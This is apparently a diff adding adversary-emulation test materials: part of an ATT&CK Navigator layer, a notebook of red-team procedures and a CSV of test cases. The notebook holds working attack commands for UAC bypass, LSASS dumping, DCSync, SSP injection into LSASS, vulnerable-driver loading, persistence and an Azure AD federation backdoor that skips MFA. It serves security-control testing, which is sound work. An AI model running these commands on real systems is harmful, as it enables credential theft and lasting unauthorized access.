+            "techniqueID": "T1567.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1567.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1569"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1569.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1569.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1570"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1571"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1572"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1573"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1573.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1573.002"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1574"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1574.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1580"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1594"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1597"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1597.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1597.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1599"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1599.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1600"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1600.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1600.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1601"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1601.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1601.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1602"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1602.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1602.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1606"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1606.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1606.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1609"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1610"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1611"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1612"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1613"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1614"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1614.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1615"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1619"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1620"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1621"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1622"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1647"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1648"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1649"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1650"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1651"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1652"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1653"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1654"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1656"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1657"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1659"
+        }
+    ]
+}
\ No newline at end of file
diff --git a/h-index-2024/h-index-2024-v1.0-notebook.md b/h-index-2024/h-index-2024-v1.0-notebook.md
new file mode 100644
index 0000000..a14f8fe
--- /dev/null
+++ b/h-index-2024/h-index-2024-v1.0-notebook.md
@@ -0,0 +1,525 @@
+# General
+
+# Initial Access
+
+## MFA Push Spam - General guidance
+
+Push-based MFA systems are susceptible to abuse by attackers because they allow an attacker to send a large volume of MFA requests to a user in order to induce that user to accept the prompt in the hopes it ends the requests.
+
+Spam a target user with MFA approval prompts. Unlike a real-world scenario, this is not meant to test the human response to being inundated with MFA requests but rather the technical security controls for such a situation.
+
+### Guidance
+
+Send at least 10 MFA requests to the target user
+
+### Notes
+
+- If MFA is in place, but it does not use some form of zero-knowledge approval (e.g. push notification accept, SMS accept, etc), then it should be considered a block. For example, if the MFA systems requires entering a one-time code, then it would not be susceptible to this attack and therefore be blocked. If no MFA is enforced, it should be considered not blocked.
+
+## Malicious ISOs - Generic ISO-wrapped payload
+
+ISO archives can be used to deliver malicious payloads while bypassing mark-of-the-web restrictions
+
+Use an ISO to deliver a malicious executable payload
+
+### Prerequisites
+
+1. Payload
+1. ISO containing the payload 
+   1. You can use `mkisofs` to create an ISO:
+   ```
+   bash> mkisofs -J -o {{ iso }} {{ payload }}
+   ```
+
+## Cloud storage sharing - General guidance
+
+### Prerequisites
+
+- Have an account on a cloud storage service that allows sharing files via email
+
+### Guidance
+
+Upload then share a file with a target email address via the service. For example, in Google Drive, right click -> share -> share -> enter email -> enter message -> send.
+
+### Notes
+
+Some cloud storage services perform file scanning of uploaded files for malicious content. Consider uploading the file immediately before sharing to limit the impact on testing.
+
+## Suspicious connections - General guidance
+
+### Guidance
+
+When using a browser, you can override the user agent string by using an extension. For example:
+
+- Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher
+- Chrome: https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg
+
+You can override your source IP by using a VPN running on a VPS hosted in an anomalous geolocation.
+
+## Suspicious connections - General guidance
+
+### Guidance
+
+When using a browser, you can override the user agent string by using an extension. For example:
+
+- Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher
+- Chrome: https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg
+
+You can override your source IP by using a VPN running on a VPS hosted in an anomalous geolocation.
+
+# Defense Evasion
+
+## Malicious kernel driver use - load known-abusable driver
+
+Kernel drivers can be used by attackers for a number of malicious activities, including hiding artifacts and tampering with endpoint security tools.
+
+This bypasses the need for attackers to retrieve legitimate code-signing certificates for a driver they wrote.
+
+### Prerequisites
+
+- Local admin
+- A known-abusable driver. Examples: 
+  - **DBUtil_2_3 (SHA256 - 0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5)**
+  - RTCore64 (SHA256 - 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd)
+  - IQVM64 (SHA256 - 4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b)
+
+### Guidance
+
+Example loading using sc.exe
+
+```
+cmd> sc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\windows\System32\Drivers\{{ sys_file }} displayname= {{ name }}
+```
+
+### Cleanup
+
+- Is using sc.exe, stop and delete the service then restart the machine
+
+### Notes
+
+Drivers can be found in multiple places, including:
+
+- Directly from vendor sites
+- VirusTotal
+- Aggregators like LOLDrivers and KDU
+  - LOLDrivers: https://github.com/magicsword-io/LOLDrivers/tree/main/drivers
+  - KDU: https://github.com/hfiref0x/KDU/
+
+## UAC Bypass - via fodhelper.exe
+
+User Account Control is not a security control but can cause issues with execution when attempting privileged operations
+
+Move to a high-integrity execution context via fodhelper.exe and a Registry modification. Fodhelper.exe is one of many unpatched methods for bypassing UAC.
+
+### Prerequisites
+
+- Split-token admin account
+
+### Guidance
+
+Check for the existence of the target registry key. If it exists, note the value so that it can be restored after execution.
+
+```
+cmd> reg query HKCU\Software\Classes\ms-settings\Shell\Open\command
+```
+
+Modify the registry key and execute fodhelper.exe to obtain an elevated command prompt:
+
+```
+cmd> 
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+c:\windows\system32\fodhelper.exe
+```
+
+### Cleanup
+
+If the registry existed prior to execution, restore its value:
+
+```
+cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v {{ initial_command }} /f
+```
+
+Otherwise, delete the key:
+
+```
+cmd> reg delete HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+```
+
+### References
+
+- https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+- https://4pfsec.com/offensive-windows-fodhelper-exe/
+
+## DLL Side Loading - General guidance
+
+### Notes
+
+- For an up-to-date list of side-loadable DLLs, refer to https://hijacklibs.net/
+
+## DLL Search Order Hijacking - MpCmdRun.exe sideloading
+
+MpCmdRun.exe is susceptible to a DLL sideloading hijack via its dependency on MpClient.dll
+
+### Prerequisites
+
+- A DLL with the appropriate exports called `mpclient.dll`
+  - Use: https://github.com/2XXE-SRA/payload_resources/tree/master/dllsideload/mpclient
+
+### Guidance
+
+Copy `c:\program files\windows defender\mpcmdrun.exe` to the same directory as the `mpclient.dll` payload then run `mpcmdrun.exe`
+
+## Conditional Access Policy Modifications - General guidance
+
+### Notes
+
+- Create a new conditional access policy to avoid modifying production policies. Additionally, consider disabling the policy or setting it to report-only before modifying it. 
+
+# Collection
+
+# Discovery
+
+# Command and Control
+
+## Remote Assistance Software - General guidance
+
+Access via remote assistance software
+
+Select and use a well-known remote assistance software
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+   1. TeamViewer: https://www.teamviewer.com/
+   2. GoTo Resolve: https://www.goto.com/it-management/resolve
+   3. ConnectWise Control: https://control.connectwise.com/
+
+### Notes
+
+- Where possible, use remote assistance software already in use in the environment
+
+## Remote tool download - General guidance
+
+Transfer tool into environment by downloading from the Internet
+
+### Notes
+
+- The maliciousness level of the binary should align with the intent of the test. For testing signature-based checks, use a known malicious tool, such as Mimikatz. For testing sandboxing or similar network security technologies, use an unknown yet still overtly malicious tool, such as one built around the current attack infrastructure. By default, start with the most malicious choice.
+
+# Credential Access
+
+## DCSync - via Mimikatz
+
+The DCSync attack mimics normal replication behavior between DCs, allowing for remote extraction of credentials
+
+Uses Mimikatz's lsadump::dcsync command
+
+### Prerequisites
+
+- Command execution in the context of an account with Active Directory replication rights
+- User accounts to target
+- Mimikatz binary (https://github.com/gentilkiwi/mimikatz)
+
+### Guidance
+
+```
+mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ target_username }}
+```
+
+### Troubleshooting
+
+If Mimikatz is giving an error of `ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)`, try the following:
+
+```
+cmd> klist purge
+cmd> gpupdate /force
+```
+
+## LSASS dumping using comsvcs.dll - via rundll32.exe
+
+Use `rundll32.exe` to call the `MiniDump` export from `comsvcs.dll`
+
+### Prerequisites
+
+- Administrator rights
+- SeDebugPrivilege
+
+### Guidance
+
+```
+shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full
+```
+
+This command must be run from a shell process that has `SeDebugPrivilege` enabled. 
+PowerShell should work to this end. 
+
+You can acquire `SeDebugPrivilege` for `cmd.exe` by launching it as `SYSTEM` via Sysinternals' `PsExec` (`psexec -sid cmd`). 
+Alternatively, you can use the VBScript file from `modexp`: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ (`cscript procdump.vbs lsass.exe`)
+
+### Cleanup
+
+- Delete the dump file
+
+## LSASS Security Service Provider - Temporary SSP
+
+Register a Security Service Provider (SSP) for LSASS. This will trigger a DLL load of the SSP into LSASS.
+
+Register an SSP temporarily by calling the AddSecurityPackage() API.
+
+### Prerequisites
+
+- Local administrator 
+- A compiled SSP DLL and a method of calling the AddSecurityPackage() API (e.g. custom exe payload)
+    - SSP source: https://github.com/2XXE-SRA/payload_resources/blob/master/c/lsa_ssp.c
+      - This can be compiled using MinGW via `x86_64-w64-mingw32-gcc -shared -municode -o ssp.dll lsa_ssp.c -lsecur32`
+    - SSP loader: https://github.com/2XXE-SRA/payload_resources/blob/master/powershell/ssp_loader.ps1
+
+### Guidance
+
+Open an administrative PowerShell terminal. 
+
+If using the script linked above, run the following command
+
+```
+PS> .\ssp_loader.ps1 {{ ssp_dll_path }}
+```
+
+If loading manually, first set the path to the compiled SSP DLL into a variable
+
+```
+PS> $DllName = "{{ ssp_dll_path }}"
+```
+
+Then load the SSP into LSASS
+
+```
+PS>
+$DynAssembly = New-Object System.Reflection.AssemblyName('SSPI2')
+$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI2', $False)
+
+$TypeBuilder = $ModuleBuilder.DefineType('SSPI2.Secur32', 'Public, Class')
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('AddSecurityPackage',
+    'secur32.dll',
+    'Public, Static',
+    [Reflection.CallingConventions]::Standard,
+    [Int32],
+    [Type[]] @([String], [IntPtr]),
+    [Runtime.InteropServices.CallingConvention]::Winapi,
+    [Runtime.InteropServices.CharSet]::Auto)
+
+$Secur32 = $TypeBuilder.CreateType()
+
+if ([IntPtr]::Size -eq 4) {
+    $StructSize = 20
+} else {
+    $StructSize = 24
+}
+
+$StructPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal($StructSize)
+[Runtime.InteropServices.Marshal]::WriteInt32($StructPtr, $StructSize)
+
+$Secur32::AddSecurityPackage($DllName, $StructPtr)
+```
+
+### Cleanup
+
+- The SSP will be removed on system reboot or after manually calling DeleteSecurityPackage()
+
+### References
+
+- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+
+# Lateral Movement
+
+# Exfiltration
+
+## Exfiltration to cloud storage - General guidance
+
+Select and use a well-known cloud storage service
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+   1. Generic: https://rclone.org/downloads/
+   2. MEGA: https://mega.io/desktop
+   3. Dropbox: https://www.dropbox.com/install
+
+### Notes
+
+- Where possible, use cloud storage service already in use in the environment
+
+## DLP Test - General use
+
+DLP Test (dlptest.com) is a web utility for testing if exfiltration of sensitive data is successful
+
+General usage notes for DLP Test
+
+### Notes
+
+- If sample sensitive data is needed, the site provides it in different types and formats
+- The site supports HTTP, HTTPS, and FTP
+- Do not upload actual sensitive data to the site
+
+# Impact
+
+## GPO Modifications - General guidance
+
+### Notes
+
+- Create a new group policy object to avoid modifying production policies. Additionally, consider disabling the policy before modifying it. 
+
+# Execution
+
+# Persistence
+
+## Scheduled Task Persistence - via schtasks.exe
+
+Use built-in schtasks.exe to persist by creating a scheduled task
+
+### Guidance
+
+```
+CMD> schtasks /Create /SC DAILY /TN "{{ taskname }}" /TR "{{ command }}" /ST 09:00
+```
+
+### Cleanup
+
+```
+CMD> schtasks /delete /tn "{{ taskname }}" /f
+```
+
+## Windows Service Persistence - via sc.exe
+
+Use built-in sc.exe to persist
+
+### Guidance
+
+```
+CMD> sc create {{ service_name }} binPath= "{{ command }}"
+```
+
+### Cleanup
+
+```
+CMD> sc delete {{ service_name }}
+```
+
+## Registry Run Key Persistence - via reg.exe
+
+Use built-in reg.exe to persist via the Registry by setting a command to be run on user login
+
+### Guidance
+
+```
+CMD> reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "{{ key_name }}" /t REG_SZ /F /D "{{ command }}"
+```
+
+### Cleanup
+
+```
+CMD> reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /F /V "{{ key_name }}"
+```
+
+## New user persistence - via net.exe
+
+Use built-in net.exe to persist by creating a new local administrator user
+
+### Guidance
+
+```
+CMD> net user /add {{ username }} {{ password }}
+CMD> net localgroup {{ group_name }} {{ username }} /add
+```
+
+### Cleanup
+
+```
+CMD> net user /delete {{ username }}
+```
+
+## Persistence in Azure AD - Register a New Device
+
+Register a new device in Azure AD
+
+### Prerequisites
+
+- Azure AD credentials
+- AAD Internals PowerShell module (https://aadinternals.com/aadinternals/#installation)
+  - Install: `PS> install-module aadinternals -scope currentuser`
+  - Import: `PS> import-module aadinternals`
+
+### Guidance
+
+Authenticate to Azure AD and save the token
+
+```
+PS> Get-AADIntAccessTokenForAADJoin -SaveToCache
+```
+
+Register a device: 
+
+```
+PS> Join-AADIntDeviceToAzureAD -DeviceName "{{ device_name }}" -DeviceType "{{ device_type }}" -OSVersion "{{ os_version }}" -JoinType Register
+```
+
+  - This will save a `.pfx` certificate to the current working directory, which is needed for cleanup
+  - Note: The provided values do not need to refer to real characteristics
+
+### Cleanup
+
+Remove the device from Azure AD 
+
+```
+PS> Remove-AADIntDeviceFromAzureAD -PfxFileName {{ pfx_certificate_file }}
+```
+
+## Azure AD Domain Federation - Backdoor via AADInternals
+
+Use AADInternals to create a backdoor federation domain for persisting access to an environment.
+
+### Prerequisites
+
+- Permissions to modify domain authentication settings
+  - and an access token for the user with these permissions, referred to as `$at` in example commands. To retrieve a token, use `$at=Get-AADIntAccessTokenForAADGraph -Credentials (get-credential)` and proceed through the prompts
+- AADInternals installed
+  - `Install-Module AADInternals`
+- A target verified domain in Azure AD
+  - To add a domain, Go to Azure AD -> custom domain names -> add -> set the provided DNS records for your domain -> wait for the verification to compelete
+- A user with an immutable ID set
+  - To set an immutable ID for a user: `Set-AADIntUser -UserPrincipalName {{ upn_or_email }} -ImmutableId "{{ id }}" -AccessToken $at` where the `id` is an arbitrary unnique value
+
+### Guidance
+
+To set the backdoor 
+
+```
+PS> ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "{{ domain }}"
+```
+
+To use the backdoor. This works for any user in the tenant, regardless of their domain.
+
+```
+Open-AADIntOffice365Portal -ImmutableID {{ id }} -UseBuiltInCertificate -ByPassMFA $true -Issuer {{ issuer }}
+```
+
+- `id` is the immutable ID of the target user
+- `issuer` is the IssuerUri provided in the output of the previous command 
+
+### Cleanup
+
+- Delete the domain
+
+### Notes
+
+- The domain must be verified for the backdoor to work
+
+### References
+
+- https://o365blog.com/post/aadbackdoor/
+- https://www.mandiant.com/resources/blog/detecting-microsoft-365-azure-active-directory-backdoors
+
diff --git a/h-index-2024/h-index-2024-v1.0-summary.csv b/h-index-2024/h-index-2024-v1.0-summary.csv
new file mode 100644
index 0000000..e8366e3
--- /dev/null
+++ b/h-index-2024/h-index-2024-v1.0-summary.csv
@@ -0,0 +1,52 @@
+"Test Case","MITRE ID","Campaign","Description"
+"Prompt a user with multiple MFA requests","T1621","Initial Access","Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt."
+"Attachment - Macro","T1566.001","Initial Access","Send a spearphishing attachment containing a malicious macro payload to a target inbox"
+"Attachment - ISO","T1566.001","Initial Access","Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions."
+"Link - Zipped DLL via sharing","T1566.002","Initial Access","Send a link to a zipped DLL payload stored on a cloud storage service like Google Drive by using the sharing features of that service"
+"Suspicious external employee login","T1078","Initial Access","Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt."
+"Suspicious service use","T1078","Initial Access","Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service."
+"Load known-abusable kernel driver","T1014","Defense Evasion","Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes."
+"DLL execution using Rundll32","T1218.011","Defense Evasion","Execute a malicious DLL's function directly using rundll32"
+"Bypass User Account Control (UAC) via fodhelper","T1548.002","Defense Evasion","Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification"
+"Clear Windows Event Log entries","T1070.001","Defense Evasion","Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs."
+"Sideload a DLL into a legitimate application","T1574.002","Defense Evasion","Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application."
+"Disable Windows Defender via PowerShell","T1562.001","Defense Evasion","Use PowerShell's Set-MpPreference to disable Windows Defender"
+"Modify identity policy in IdP","T1484","Defense Evasion","Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement."
+"Screen Capture","T1113","Collection","Capture an image of the user's screen"
+"Keylogger","T1056.001","Collection","Log user keystrokes"
+"Domain Controller discovery via nltest","T1018","Discovery","Use nltest.exe to identify domain controllers in the domain"
+"Domain trust discovery via nltest","T1482","Discovery","Identify domain trust relationships using nltest.exe"
+"Enumerate domain groups and users using net","T1087.002","Discovery","Enumerate domain users and domain groups using the builtin net.exe"
+"BloodHound DC enumeration","T1087.002","Discovery","Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller"
+"Internal network scan using Net Scan","T1046","Discovery","Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect"
+"HTTP C2 over tcp/80","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP"
+"HTTPS C2 over tcp/443","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS"
+"Access via remote assistance tool","T1219","Command and Control","Establish connection to system using a legitimate remote assistance application"
+"Remote tool download over HTTP","T1105","Command and Control","Download a tool from a public hosting location onto the victim system"
+"Extract domain user credentials via replication","T1003.006","Credential Access","Replicate a user's hash from a domain controller using replication APIs (DCSync)."
+"Extract Logonpasswords via Nanodump","T1003.001","Credential Access","Use nanodump to extract credentials from LSASS process memory"
+"Dump LSASS memory using Sysinternals ProcDump","T1003.001","Credential Access","Use ProcDump from Sysinternals to dump LSASS process memory"
+"Dump LSASS memory using builtin comsvcs.dll","T1003.001","Credential Access","Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk"
+"Extract browser cookies","T1555.003","Credential Access","Extract cookie information from the user's browser"
